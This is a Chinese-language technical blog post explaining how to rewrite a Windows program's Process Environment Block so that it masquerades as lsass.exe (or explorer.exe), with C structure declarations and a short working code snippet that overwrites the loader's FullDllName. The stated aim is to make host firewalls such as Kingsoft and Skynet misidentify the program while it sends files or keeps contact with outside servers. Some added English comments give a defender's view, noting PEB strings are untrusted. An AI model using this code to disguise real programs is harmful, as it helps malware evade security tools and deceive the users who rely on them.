修改程序的peb过某些防火墙


现在自己构造数据包进行发送已经不是很现实了,简单的数据还行,如果是大的数据,比如发送一个文件,比如不停的和外界的服务器保持联系,都是很不方便的,所以找到了一个方法,就是将程序的peb修改成和某些系统进程一样的peb,这样就在一定程度上伪装成了系统进程,这里以lsass.exe为例。有关peb的资料请自己查相关资料,或者是好好看看 windows核心编程,windows程序设计。

首先声明相关的结构体

// Callback signature stored in the PEB's FastPebLockRoutine / FastPebUnlockRoutine
// members (see struct _PEB below). The single argument is presumably the PEB's
// FastPebLock pointer — the parameter name suggests it, nothing here proves it.
typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);

/*
 * Counted UTF-16 string as used by the native NT API.
 * In the public ntdef.h definition Length and MaximumLength are byte counts,
 * not character counts, and Length excludes any terminator; Buffer need not
 * be NUL-terminated, so readers must honour Length rather than scan for 0.
 * Because Buffer is a plain pointer, whoever can write the owning structure
 * can make the string point at arbitrary process memory.
 */
typedef struct _UNICODE_STRING {
        USHORT Length;          // bytes currently in use
        USHORT MaximumLength;   // bytes available in Buffer
        PWSTR Buffer;           // UTF-16 storage, owned elsewhere
} UNICODE_STRING, *PUNICODE_STRING;

/*
 * One per-drive current-directory record. RTL_USER_PROCESS_PARAMETERS
 * (below) embeds an array of 0x20 of these; presumably one slot per drive
 * letter plus spares — confirm against the target Windows version.
 */
typedef struct _RTL_DRIVE_LETTER_CURDIR {
        USHORT Flags;
        USHORT Length;
        ULONG TimeStamp;
        UNICODE_STRING DosPath;   // the drive's current directory, as a counted string
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;


/*
 * Loader bookkeeping reached through PEB.LoaderData. The three LIST_ENTRY
 * members are list heads; the nodes they link are the LIST_ENTRY members of
 * the same name embedded in LDR_MODULE. The later code on this page takes
 * InLoadOrderModuleList.Flink and casts it straight to LDR_MODULE*, which only
 * works because InLoadOrderModuleList is the first member of LDR_MODULE.
 * These lists live in writable user-mode memory, so a process can rewrite
 * what they describe about itself.
 */
typedef struct _PEB_LDR_DATA
{
        ULONG Length;
        BOOLEAN Initialized;
        PVOID SsHandle;
        LIST_ENTRY InLoadOrderModuleList;            // head; first node is treated as the main image by the page
        LIST_ENTRY InMemoryOrderModuleList;
        LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

/*
 * One loaded-module record on the PEB_LDR_DATA lists.
 * InLoadOrderModuleList must stay the first member: the code on this page
 * casts a LIST_ENTRY* taken from the load-order list directly to LDR_MODULE*.
 *
 * NOTE(review): FullDllName and BaseDllName are ordinary process-writable
 * strings. Any tool that identifies a process by reading these from the PEB
 * sees whatever the process chose to write there (this page overwrites
 * FullDllName). Trustworthy identification must come from kernel-reported
 * data (image path obtained through a process handle, code signature of the
 * mapped file) rather than from PEB-resident strings.
 */
typedef struct _LDR_MODULE {
        LIST_ENTRY InLoadOrderModuleList;            // must remain first (see above)
        LIST_ENTRY InMemoryOrderModuleList;
        LIST_ENTRY InInitializationOrderModuleList;
        PVOID BaseAddress;
        PVOID EntryPoint;
        ULONG SizeOfImage;
        UNICODE_STRING FullDllName;                  // untrusted: writable by the process itself
        UNICODE_STRING BaseDllName;                  // untrusted: writable by the process itself
        ULONG Flags;
        SHORT LoadCount;
        SHORT TlsIndex;
        LIST_ENTRY HashTableEntry;
        ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

/*
 * Process start-up parameters reached through PEB.ProcessParameters.
 * Layout as reproduced on this page; it is an undocumented structure and
 * member offsets may differ between Windows versions — confirm before use.
 *
 * NOTE(review): ImagePathName and CommandLine live here, in user-mode memory
 * the process can write. They are no more trustworthy for identifying a
 * process than the LDR_MODULE name strings; prefer kernel-reported values.
 */
typedef struct _RTL_USER_PROCESS_PARAMETERS {
        ULONG MaximumLength;
        ULONG Length;
        ULONG Flags;
        ULONG DebugFlags;
        PVOID ConsoleHandle;
        ULONG ConsoleFlags;
        HANDLE StdInputHandle;
        HANDLE StdOutputHandle;
        HANDLE StdErrorHandle;
        UNICODE_STRING CurrentDirectoryPath;
        HANDLE CurrentDirectoryHandle;
        UNICODE_STRING DllPath;
        UNICODE_STRING ImagePathName;                // untrusted: process-writable
        UNICODE_STRING CommandLine;                  // untrusted: process-writable
        PVOID Environment;
        ULONG StartingPositionLeft;
        ULONG StartingPositionTop;
        ULONG Width;
        ULONG Height;
        ULONG CharWidth;
        ULONG CharHeight;
        ULONG ConsoleTextAttributes;
        ULONG WindowFlags;
        ULONG ShowWindowFlags;
        UNICODE_STRING WindowTitle;
        UNICODE_STRING DesktopName;
        UNICODE_STRING ShellInfo;
        UNICODE_STRING RuntimeData;
        RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];   // per-drive current directories
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

// Node of the singly linked list that PEB.FreeList points to; Next is NULL-terminated
// by convention (not shown here — confirm against the consumer).
typedef struct _PEB_FREE_BLOCK {
        struct _PEB_FREE_BLOCK *Next;
        ULONG Size;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;

/*
 * Process Environment Block as reproduced on this page.
 *
 * This appears to be the 32-bit (x86) layout: the use site later on the page
 * obtains the PEB pointer with `mov eax, fs:0x30`, which is the x86 TEB slot,
 * and pointer-sized members are declared ULONG/PVOID at 4-byte granularity.
 * The PEB is undocumented and its member offsets change between Windows
 * versions and between 32-/64-bit processes; reading or writing a member at
 * the wrong offset corrupts the process's own loader state. The page itself
 * warns that this technique destabilises the process — that is the expected
 * failure mode of a layout mismatch, not an incidental one.
 *
 * Defender's view: everything in this structure is in writable user-mode
 * memory, so none of it is evidence about the process that the process could
 * not have fabricated. Identification and policy decisions should be based on
 * kernel-side data (the mapped image's path and signature obtained through a
 * handle), and a divergence between PEB-resident names and the kernel-reported
 * image path is itself a useful detection signal.
 */
typedef struct _PEB {
        BOOLEAN InheritedAddressSpace;
        BOOLEAN ReadImageFileExecOptions;
        BOOLEAN BeingDebugged;                       // set by the system while a debugger is attached
        BOOLEAN Spare;
        HANDLE Mutant;
        PVOID ImageBaseAddress;
        PPEB_LDR_DATA LoaderData;                    // module lists; see PEB_LDR_DATA / LDR_MODULE
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters;   // image path, command line, environment
        PVOID SubSystemData;
        PVOID ProcessHeap;
        PVOID FastPebLock;
        PPEBLOCKROUTINE FastPebLockRoutine;
        PPEBLOCKROUTINE FastPebUnlockRoutine;
        ULONG EnvironmentUpdateCount;
        PVOID *KernelCallbackTable;
        PVOID EventLogSection;
        PVOID EventLog;
        PPEB_FREE_BLOCK FreeList;
        ULONG TlsExpansionCounter;
        PVOID TlsBitmap;
        ULONG TlsBitmapBits[0x2];
        PVOID ReadOnlySharedMemoryBase;
        PVOID ReadOnlySharedMemoryHeap;
        PVOID *ReadOnlyStaticServerData;
        PVOID AnsiCodePageData;
        PVOID OemCodePageData;
        PVOID UnicodeCaseTableData;
        ULONG NumberOfProcessors;
        ULONG NtGlobalFlag;
        BYTE Spare2[0x4];
        LARGE_INTEGER CriticalSectionTimeout;
        ULONG HeapSegmentReserve;
        ULONG HeapSegmentCommit;
        ULONG HeapDeCommitTotalFreeThreshold;
        ULONG HeapDeCommitFreeBlockThreshold;
        ULONG NumberOfHeaps;
        ULONG MaximumNumberOfHeaps;
        PVOID **ProcessHeaps;
        PVOID GdiSharedHandleTable;
        PVOID ProcessStarterHelper;
        PVOID GdiDCAttributeList;
        PVOID LoaderLock;
        ULONG OSMajorVersion;
        ULONG OSMinorVersion;
        ULONG OSBuildNumber;
        ULONG OSPlatformId;
        ULONG ImageSubSystem;
        ULONG ImageSubSystemMajorVersion;
        ULONG ImageSubSystemMinorVersion;
        ULONG GdiHandleBuffer[0x22];
        ULONG PostProcessInitRoutine;
        ULONG TlsExpansionBitmap;
        BYTE TlsExpansionBitmapBits[0x80];
        ULONG SessionId;
} PEB, *PPEB;

然后开始使用

PPEB peb;
 PLDR_MODULE pMod;
 
 char systempAth[PATHLEN*2];
 char tempsystempAth[PATHLEN*2];
 int i;
 GetSystemDirectory(tempsystempAth,PATHLEN);
 strcat(tempsystempAth,"//lsass.exe");
 //把ASCII转换为UNICODE,字符
 for (i=0;i<PATHLEN;i++)
 {
  systempAth[i*2] = tempsystempAth[i];
  systempAth[i*2+1] = 0;
 }
 __asm
 {
  mov eax,fs:0x30
  mov peb,eax
 }
 
 pMod = (LDR_MODULE*)peb->LoaderData->InLoadOrderModuleList.Flink;
 pMod->FullDllName.MaximumLength = 202;
 pMod->FullDllName.Length = 200;
 pMod->FullDllName.Buffer = (unsigned short*)systempAth;

这样,就将自己的程序peb伪装成了lsass.exe,金山网镖、天网防火墙这个时候已经不能正确识别我们当前的程序,这个时候只要程序一进行网络通讯,天网和网镖会提示lsass.exe要访问网络,当然了,这个时候如果是选择阻止,还是没法穿透防火墙的,说白了这种方法就是一种欺骗。当然了,除了伪装成lsass.exe还可以伪装成其他的程序,比如explorer.exe都可以,但是有个问题,如果当前的程序不稳定,代码不严格,程序崩溃的话,你所伪装成的程序也是会受到影响的,也会崩溃,所以此种方法要慎用。

 
